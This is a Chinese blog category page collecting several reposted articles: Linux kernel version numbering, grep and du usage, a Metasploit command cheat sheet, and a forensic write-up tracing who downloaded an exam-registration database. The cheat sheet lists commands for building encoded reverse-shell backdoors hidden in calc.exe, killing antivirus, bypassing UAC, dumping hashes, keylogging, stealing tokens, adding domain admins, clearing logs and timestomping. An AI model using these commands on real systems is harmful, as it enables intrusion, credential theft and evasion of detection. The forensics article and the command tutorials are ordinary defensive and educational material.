分类 学习类 下的文章

linux内核(kernel)版本号的意义

在linux下有一个目录,即/usr/src/kernels/目录,下面记载着一个linux系统的内核文件,
例如:2.6.18-164.el5-x86_64、2.6.18-8.el5-x86_64和2.6.18-194.el5-x86_64等,这些文件编号意味着什么呢?例如2.6.18代表着什么?el5代表着什么?x86_64又代表着什么?
linux内核版本的分类
Linux内核版本有两种:稳定版和开发版 ,Linux内核版本号由3组数字组成:第一个组数字.第二组数字.第三组数字
第一个组数字:目前发布的内核主版本。
第二个组数字:偶数表示稳定版本;奇数表示开发中版本。
第三个组数字:错误修补的次数。
例1: 2.6.18-128.ELsmp ,
第一个组数字: 2 , 主版本号
第二个组数字: 6 , 次版本号,表示稳定版本(因为有偶数)
第三个组数字 18 , 修订版本号 , 表示修改的次数,头两个数字合在一齐可以描述内核系列。如稳定版的2.6.0,它是2.6版内核系列。128: 表示这个当前版本的第5次微调patch , 而ELsmp指出了当前内核是为ELsmp特别调校的 EL : Enterprise Linux ; smp : 表示支持多处理器 , 表示该内核版本支持多处理器
linux内核下里的ELsmp与EL与smp
在linux下ELsmp指出了当前内核是为ELsmp特别调校的 EL : Enterprise Linux ; smp : 表示支持多处理器 , 表示该内核版本支持多处理器
例2:Red Hat Linux开机的时候,GRUB的启动菜单会有两个选项,分别是 Red Hat Enterprise Linux ES (版本号.ELsmp) Red Hat Enterprise Linux ES-up (版本号.EL) 其实这个就是系统开机时由GRUB引导启动 - 单处理器与对称多处理器启动核心文件的区别。 Red Hat Enterprise Linux ES (版本号.ELsmp) multiple processor (symmetric multiprocessing ) Red Hat Enterprise Linux ES-up (版本号.EL) uniprocessor
linux位数
我们知道目前的CPU主要分为32位与64位,其中32位又可以分为:i386、i586、i686、而64的CPU则称为x86_64,这是因为不同等级的CPU命令集不相同,因此你的某些软件可能会再你的CPU进行某些优化,所以软件就有了i386、i586、i686与x86_64之分,以目前的CPU市场上来说,大多数都是坚持64位的软件。
================================================
内核版本指的是在Linus领导下的开发小组开发出的系统内核的版本号。第一数字叫主版本号,第二个叫次版本号,第三个叫修订版本号。一般说来次版本号还有特定的意义,以序号的第二位为偶数的版本表明这是一个可以使用的稳定版本,如2.0.35,而序号的第二位为奇数的版本一般有一些新的东西加入,是不一定很稳定的测试版本,如2.1.88。这样稳定版本来源于上一个测试版升级版本号,而一个稳定版本发展到完全成熟后就不再发展。
总结一下:
第一个数字表示大版本,相当于大升级了.
第二个数字有两个含义:大版本的小版本;偶数表示生产版(奇数表示测试版);
第三个数字表示指定小版本的补丁包;如2.6.10 Linux内核的推出,表明一年中已经发布了10个版本.
不过,2.6.x系列以前版本没有带有次小数点的版本号,即没有四个数字组成的版本号,而在2.6.x系列中,从2.6.8.1内核开始,一直持续到2.6.11,较小的内核隐患和安全补丁被赋予了次小数点版本号(例如2.6.11.1)。
但值得注意的是.readhat linux内核的版本稍有不同如2.4.20-10,可以发现多了一组数字(10),该数字是建立(build)号。每个建立可以增加少量新的驱动程序或缺陷修复。一些readhat 内核还带“pp”,就是“pre-patch”的意思,是个内核的测试版本。

grep 搜索字符串命令

用‘grep’搜索文本文件
如果您要在几个文本文件中查找一字符串,可以使用‘grep’命令。‘grep’在文本中搜索指定的字符串。
假设您正在‘/usr/src/linux/Documentation’目录下搜索带字符串‘magic’的文件:
$ grep magic /usr/src/linux/Documentation/*
sysrq.txt:* How do I enable the magic SysRQ key?
sysrq.txt:* How do I use the magic SysRQ key?
其中文件‘sysrp.txt’包含该字符串,讨论的是 SysRQ 的功能。
默认情况下,‘grep’只搜索当前目录。如果此目录下有许多子目录,‘grep’会以如下形式列出:
grep: sound: Is a directory
这可能会使‘grep’的输出难于阅读。这里有两种解决的办法:
明确要求搜索子目录:grep -r
或忽略子目录:grep -d skip
当然,如果预料到有许多输出,您可以通过 管道 将其转到‘less’上阅读:
$ grep magic /usr/src/linux/Documentation/* | less
这样,您就可以更方便地阅读。
有一点要注意,您必需提供一个文件过滤方式(搜索全部文件的话用 *)。如果您忘了,‘grep’会一直等着,直到该程序被中断。如果您遇到了这样的情况,按 ,然后再试。
下面是一些有意思的命令行参数:
grep -i pattern files :不区分大小写地搜索。默认情况区分大小写,
grep -l pattern files :只列出匹配的文件名,
grep -L pattern files :列出不匹配的文件名,
grep -w pattern files :只匹配整个单词,而不是字符串的一部分(如匹配‘magic’,而不是‘magical’),
grep -C number pattern files :匹配的上下文分别显示[number]行,
grep pattern1 | pattern2 files :显示匹配 pattern1 或 pattern2 的行,
grep pattern1 files | grep pattern2 :显示既匹配 pattern1 又匹配 pattern2 的行。
这里还有些用于搜索的特殊符号:
< 和 > 分别标注单词的开始与结尾。
例如:
grep man * 会匹配 ‘Batman’、‘manic’、‘man’等,
grep ' grep '' 只匹配‘man’,而不是‘Batman’或‘manic’等其他的字符串。

Linux查看文件夹大小及统计总数等

统计总数大小

du -sh xmldb/

du -sm * | sort -n //统计当前目录大小 并安大小 排序

du -sk * | sort -n

du -sk * | grep guojf //看一个人的大小

du -m | cut -d "/" -f 2 //看第二个/ 字符前的文字

查看此文件夹有多少文件 * 有多少文件

du xmldb/

du xmldb* |wc -l

40752

解释:

wc [-lmw]

参数说明:

-l :多少行

-m:多少字符

-w:多少字

du 命令

用途

概述磁盘使用。

语法
du [ -a | -s ] [ -k ] [ -m ] [ -g ][ -l ] [ -r ] [ -x ] [ -H | -L ][ File ... ]

描述
du命令显示用于文件的块的数量。如果指定的File参数实际上是一个目录,就要报告该目录内的所有文件。如果没有提供 File参数,du命令使用当前目录内的文件。

如果File参数是一个目录,那么报告的块的数量就是分配到目录中文件以及分配到目录自身的块之和。

指定-a标志,报告个体文件中块数量。不管是否使用了-a标志,由File参数指定的个体文件总是要列出。

指定-s标志,报告用于所有指定文件和目录中所有文件的全部块。

块计数包括每个文件的间接块。块计数是通过 512 字节单位计算的,它与系统使用的群集大小无关。指定-k标志,通过 1024 字节单位计算块数。

注:
具有多个链接的文件只为一个条目计数和书写。
由于块计数只基于文件大小,所以在报告的块数中,未分配的块是没有包含进去的。
如果du得不到文件属性,或者无法读取目录,它就报告一个错误,并且会影响命令的退出状态。

标志

-a 为每个指定文件显示磁盘使用情况,或者为目录中每个文件显示各自磁盘使用情况。将该标志与-s标志进行对比。
-g 用 GB 单位计算块数,而不是用缺省的 512 字节单位。对磁盘使用情况的输出值要用浮点数,这是因为如果用字节为单位的话,值会非常大。
-H 如果在命令行指定了符号链接,du 命令将统计链接引用的文件或文件层次结构的大小。
-k 用 1024 字节单位计算块数,而不是用缺省的 512 字节单位。
-l 在文件链接和多链接之间均匀地分配块。根据缺省值,有两个或者更多链接的文件只计数一次。
-L 如果在命令行指定了符号链接或者在文件层次结构的遍历中多次遇到符号链接,则 du 命令应统计链接引用的文件或文件层次结构的大小。
-m 用 MB 单位计算块数,而不是用缺省的 512 字节单位。对磁盘使用情况的输出值要用浮点数,这是因为如果用字节为单位的话,值会非常大。
-r 报告不可访问的文件或者目录名。此为缺省设置。
-s 为所有指定文件显示整个磁盘使用情况,或者为一个目录中的所有文件显示总的磁盘使用情况。将该标志与-a标志进行对比。
-x 在评估文件大小时,只评估那些与File参数指定的文件或者目录驻留在相同设备上的文件。例如,您可以指定一个在多个设备上包含文件的目录。这种情况下,-x标志就为与目录驻留在相同设备的所有文件显示块的大小。

如果指定了全部-k、-m和-g标志,或者是其中任意两个,最后指定的那个起作用。用标志-m和-g输出磁盘使用情况就会近似成最接近的第二位十进制数。

退出状态

此命令返回下列出口值:

0 成功结束。
>0 发生错误。

示例
要概述一个目录树及其每个子树的磁盘使用情况,请输入:

du /home/fran这在/home/fran目录及其每个子目录中显示了磁盘块数。

要通过 1024 字节块概述一个目录树及其每个子树的磁盘使用情况,请输入:
du -k /home/fran这在/home/fran目录及其每个子目录中显示了 1024 字节磁盘块数。
要通过 MB 磁盘块概述一个目录树及其每个子树的磁盘使用情况,请输入:
du -m /home/fran这在/home/fran目录及其每个子目录中显示了 MB 磁盘块数(近似到最接近的第二位十进制数)。
要通过 GB 块概述一个目录树及其每个子树的磁盘使用情况,请输入:
du -g /home/fran这在/home/fran目录及其每个子目录中显示了 GB 磁盘块数(近似到最接近的第二位十进制数)。
要显示每个文件磁盘使用情况,请输入:
du -a /home/fran这显示了包含在每个文件以及目录/home/fran的子目录中的磁盘块数。在目录旁的数字就是该目录树的磁盘使用情况。在常规文件旁的数字就是该文件单独的磁盘使用情况。
要只显示一个目录树的全部磁盘使用情况,请输入:
du -s /home/fran-s标志控制du命令,只显示/home/fran目录和其中包含的文件的磁盘使用情况的总和。通过缺省值,如果du命令无法读取一个文件或者目录,就显示一条错误消息。
除了在 /home/fran 的遍历中找到的常规文件,还要显示所有符号链接引用的文件或文件层次结构的磁盘使用,请输入:
du -L /home/fran要报告符号链接 mylink 引用的文件或文件层次结构的磁盘使用,请输入:
du -H mylink
文件

/usr/bin/du 包含命令du。

metasploit 常用命令备忘

MSFconsole Commands
-------------------------------------
24
show exploits 查看所有exploit
show payloads 查看所有payload
show auxiliary 查看所有auxiliary
search name 搜索exploit 等
info 查看加载模块的信息
use name 加载模块
LHOST 本机IP
RHOST 目标IP
set function 设置选项值
setg function 全局设置
show options 查看选项
show targets 查看exp 可选的平台
set target num 设置exp 作用平台
set payload payload 设置payload
show advanced 查看高级选项
set autorunscript migrate -f 设置自动执行指令
check 测试是否可利用
exploit 执行exp 或模块
exploit -j 作为后台执行
exploit -z 成功后不立即打开session
exploit -e encoder 指定encoder
exploit -h 查看帮助信息
sessions -l -v 列出可用sessions 详细信息
sessions -s script 在指定session 执行脚本
sessions -K 结束session
sessions -c cmd 执行指定命令
sessions -u sessionID 升级shell
db_create name 创建数据库
db_connect name 连接数据库
db_nmap nmap 扫描并导入结果
db_autopwn -h 查看autopwn 帮助
db_autopwn -p -r -e 基于端口,反弹shell
db_destroy 删除数据库
---------------------------------------------------------------------------------------------
Meterpreter Commands
----------------------------------------------------------------
help 查看帮助
run scriptname 运行脚本
sysinfo 系统基本信息
ls 列目录
use priv 运行提权组件
ps 列进程
migrate PID PID 迁移
use incognito token 窃取
25
list_tokens -u 查看可用用户token
list_tokens -g 查看可用组token
impersonate_token DOMAIN_NAMEUSERNAME 模仿token
steal_token PID 窃取PID 所属token 并模仿
drop_token 停止模仿token
getsystem 获取SYSTEM 权限
shell 运行shell
execute -f cmd.exe -i 交互式运行cmd
execute -f cmd.exe -i -t 使用可用token 运行
execute -f cmd.exe -i -H -t 同上,同时隐藏进程
rev2self 返回至初始用户
reg command 修改注册表
setkesktop number 切换至另一已登录用户屏幕
screenshot 截屏
upload file 上传文件
download file 下载文件
keyscan_start 开始截取击键记录
keyscan_stop 停止截取击键记录
getprivs 尽可能提升权限
uictl enable keyboard/mouse 获取键盘或鼠标的控制权
background 将当前meterpreter shell 转入后台
hashdump 导出所有用户hash
use sniffer 加载嗅探模块
sniffer_interfaces 查看可用网卡接口
sniffer_dump interfaceID pcapname 开始嗅探
sniffer_start interfaceID packet-buffer 指定buffer 范围嗅探
sniffer_stats interfaceID 抓取统计信息
sniffer_stop interfaceID 停止嗅探
add_user username password -h ip 添加用户
add_group_user "Domain Admins" username -h ip 添加用户至管理组
clearev 清空日志
timestomp 改变文件属性如创建时间等
reboot 重启
---------------------------------------------------------------------------------------------------------
MSFpayload Commands
---------------------------------------------------------------
msfpayload -h 查看帮助
msfpayload windows/adduser user=123 pass=123 R > payload.raw 生成添加用户的 shellcode
msfpayload windows/meterpreter/bind_tcp 0
查看指定payload 可用选项
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 X >
payload.exe
生成payload.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R >
payload.raw
26
保存为RAW 格式,可用于msfencode
msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
保存为C 格式
msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
保存为java 格式
-------------------------------------------------------------------------------------------------------
MSFencode Commands
-----------------------------------------------------------
msfencode -h 查看帮助
msfencode -l 查看可用encoder
msfencode -t (c,elf.exe,java.js_le,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho)
以指定格式显示编码后的buffer
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
生成编码后的exe
msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/countdown -c
5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded.exe
多编码器结合,多次编码
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
生成纯字符格式C 类型shellcode
----------------------------------------------------------------------------------------------------------
MSFcli Commands
-----------------------------------------------------------
msfcli |grep exploit 只显示exploit
msfcli | grep exploit/windows 只显示windows exploit
msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp
LPORT=443 RHOST=172.16.32.26 E
针对指定IP 加载指定exp 并设定payload
------------------------------------------------------------------------------------------------------------
MSF,Ninja,Fu
---------------------------------------------------------------------
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R |
msfencode -x calc.exe -k -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe
使用calc.exe 作为模板,生成经过编码的后门
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R |
msfencode -x calc.exe -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe
与上面差不多,只是执行的时候不依赖于生成的可执行文件,且不会有任何提示信息
msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -o payload.exe
-e x86/shikata_ga_nai -c 7 -t exe && msfcli multi/hanler
PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E
生成编码后的payload 并开始监听本机端口
-------------------------------------------------------------------------------------------------------
MSFvenom
-------------------------------------------------------------
msfvenom --payload 自动生成payload
27
-------------------------------------------------------------------------------------------------------------
Meterpreter Post Exploitation Commands
---------------------------------------------------------------
提权一般步骤
meterpreter> use priv
meterpreter> getsystem
meterpreter> ps
meterpreter> steal_token 1784
meterpreter> shell
net user msf msf /add /DOMAIN
net group "Domain Admins" msf /add /DOMAIN
获取hash 一般步骤
meterpreter> use priv
meterpreter> getsystem
meterpreter> hashdump
如果是在win2008 系统上:
meterpreter> run migrate
meterpreter> run killav
meterpreter> ps
meterpreter> migrate 1436
meterpreter> keyscan_start
meterpreter> keyscan_dump
meterpreter> keyscan_stop
使用Incognito 提权
meterpreter> use incognito
meterpreter> list_tokens -u
meterpreter> use priv
meterpreter> getsystem
meterpreter> list_tokens -u
meterpreter> impersonate_token IHAZSECURITYAdministrator
查看保护机制并禁用之
meterpreter> run getcountermeasure
meterpreter> run getcountermeasure -h
meterpreter> run getcountermeasure -d -k
检查是否是虚拟机
meterpreter> run checkvm
转入命令行
meterpreter> shell
28
远程VNC 控制
meterpreter> run vnc
转入后台
meterpreter> background
Bypass UAC
meterpreter> run post/windows/escalate/bypassuac
OS X 系统上dump hash
meterpreter> run post/osx/gather/hashdump
Linux 系统上dump hash
meterpreter> run post/linux/gather/hashdump

[法客二周年]看我如何取证抓出黑阔!

大家都在写日站过程,我就放出一篇抓日站的过程,哈。 

开个玩笑,实例取证过程,大家都懂的,所以严格打码,见谅~~

2099年13月33日某市某局考试报名服务器遭受了两次攻击,都是被直接下载了数据库。
下载数据库的行为是通过后台合法下载,因此,在之前的证据调查中被忽略了。

取证分析:起初,我们通过安装在考试网服务器上抓包工具抓到的数据包,导入科莱数据分析软件,转化成明文显示从而进行下一步分析,如图所示
图1
(科莱Colasoft Capsa 7 版本:7.3.1 Build 2436)
<ignore_js_op>QQ截图20131022191309.png
再以Excel格式导出,以IP排序,搜索大量连续访问的IP,搜索排出敏感url,查询是否有木马后门,或者上传操作页面等。如图2
图2
“图片漏点-已屏蔽”
<ignore_js_op>2.png
所有抓包日志分析下来,无任何可疑后门url,发现大量自动化扫描工具的扫描痕迹,均无入侵成功痕迹。

我们尝试寻找网站程序漏洞,没有注入漏洞,发现一处问题,用户可查询其他用户资料,但前提需要知道ID生成规则,如:
http://x.x.x.x/08104/ks_left.act ... f04013bac0f9b1c01d6
于是我们分析查询所有数据包日志,发现如下几个IP的ID查询登录次数与时间很可疑,
<ignore_js_op>3.png
<ignore_js_op>4.png
<ignore_js_op>5.png
221.136.152.195和 202.105.247.6这两个IP是浙江宁波联通的IP,一直有操作,以上是登录查询记录。
经分析只有两种可能:
1.他利用tables.id轮循出其他考生信息
2.不知道他怎么获得其他考生的登录密码,他反复登录
一个IP 多次登录本身就有异常,怀疑是XX考试一条龙服务公司,但一般做这行的公司基本都是本地,
宁波可能性不大,我们和人事局沟通分析他们怀疑是代考团队。
这算我们意外发现的一个漏洞,经过调查,这些线索无法定性,不确定算不算攻击。

我们怀疑入侵者很可能合法通过后台直接登录直接拿走数据,或者有服务器权限,通过和某某局机房负责人协商
,我们登录服务器进行网站程序排查,未发现任何后门木马,并从网站程序了解到数据库使用access数据库,
数据库文件名为*.mdb,下载页面downloadGJ.action
我们通过关键词mdb以及download进行url排查,发现下载痕迹。
数据包为:
<ignore_js_op>6.png
两次记录分别是:

2013/1/29 8:50        2013/1/29 8:50        218.76.159.133        HTTP        GET http://x.x.x.x/06109/downloadGJ.action(湖南省郴州市 电信)

2013/1/29 8:35        2013/1/29 8:35        61.181.22.157        HTTP        GET http://x.x.x.x/06109/downloadGJ.action(天津市 联通ADSL)
2013/01/28 08:44:59   61.152.108.187    HTTP      POST http://x.x.x.x/06109/exportdataGJ.action

我们使用数据分析软件打开2013/1/29/8:35 2013/1/29/8:44的数据包
找到downloadGj.action,如图6所示
图6:
<ignore_js_op>7.png
定位到此IP,点数据包选项,搜索定位到downloadGj.action,如图7所示
图7:
<ignore_js_op>8.png
8中
分析:在图8中,发现了此IP直接进行了TCP三次握手,然后径直访问了数据库后台下载页面,执行了下载操作。如图8所示
图8
<ignore_js_op>10.png
在图9中,是本次连接的二进制解码信息。可看到是执行了数据库下载。
<ignore_js_op>11.png
图10
在图三中,是后续的下载二进制数据的解码信息,可看到就是某某局考试报名数据库的表结构,后面分了几十个包下载,共计19M。
<ignore_js_op>12.png
图10

(注:IP地址是通过互联网查到的物理位置,未必准确,希望公安进一步核实)

经过进一步调查,发现218.76.159.133和61.181.22.157都是HTTP代理服务器。

为了穿透代理追求真实IP,我方对数据包的包头进行了二进制解码,定位到downloadGJ.action,证据图11
<ignore_js_op>13.png
从上图得知HTTP包头中追到了代理源IP地址,即来自于218.76.159.133攻击行为的源IP为221.223.70.137。
<ignore_js_op>1~.png
图11
灰色部分未记录了代理源IP的HTTP包头数据,翻译过来就是:X-Forwarded-For:
221.223.70.137

证据图12中二进制编码解析得到显示数据库的字段
<ignore_js_op>2~.png
如下证据图,通过二进制解码,可看到下载内容,
<ignore_js_op>3~.png
<ignore_js_op>4~.png
我们又用相同的方法解析了来自61.152.108.187的数据包,根据解析的数据,这次也执行了下载,真实IP也是221.223.70.137

这个真实IP每天早晨8点40左右开始下载数据。

经过三次下载行为判断,应该是同一人所为:

我们在二进制包里解析出了访问者的计算机配置:
CPU:AMD64
浏览器:IE9
操作系统:Windows 7 x64

进入途径:
我们查询http://x.x.x.x/06109/exportdataGJ.action定位到该数据包,证据图12
图12
<ignore_js_op>!!!.png
黑客直接使用admin的密码登陆,如图13
<ignore_js_op>@!.png
图13

分析建议:
建议联系当地某部门锁定这个IP,如果是家里的ADSL,可直接定位,如果是公司的IP,则可联系公司调取上网行为管理日志。
如没有日志,可通过上面给出的机器配置信息到内部找到配置类似的机器,有可能这个人有自己的笔记本电脑。

找到电脑,注意看还有没有IE访问记录,历史记录是可以保存的,如果对方删除了,历史记录还可以通过Windows隐藏位置调出。

密码泄露途径分析:
1.要么某某局自己人泄露给别人
2.要么黑客自己注入爆出密码
3.要么开发的人设置了一个隐蔽的模块,专门用来偷密码
第一种可能性我这里保留意见,个人认为不可能;
第二种可能性我认为概率不高,我们测试过,并且反编译过程中也观察过,没发现明显的注入问题,这个代码是在一个开源的中间件平台上改的(我们怀疑,看源码的时候感觉有些像,但是不敢完全肯定,他们改动很多),那么如果这上面出问题,也难说;
第三种可能性:如果设置了这个机关,那应该就是在中间件底层设置的,应用层我们都反编译了,没发现这个问题。中间件底层的话,我们如果强行进行反编译,工作量非常大,暂时放弃反编译的工作。

差不多了,以上是一次真实的取证过程,放出来给法客的基友look下,希望大家不要转载到外面!,谢谢~

 

 

本文转自法客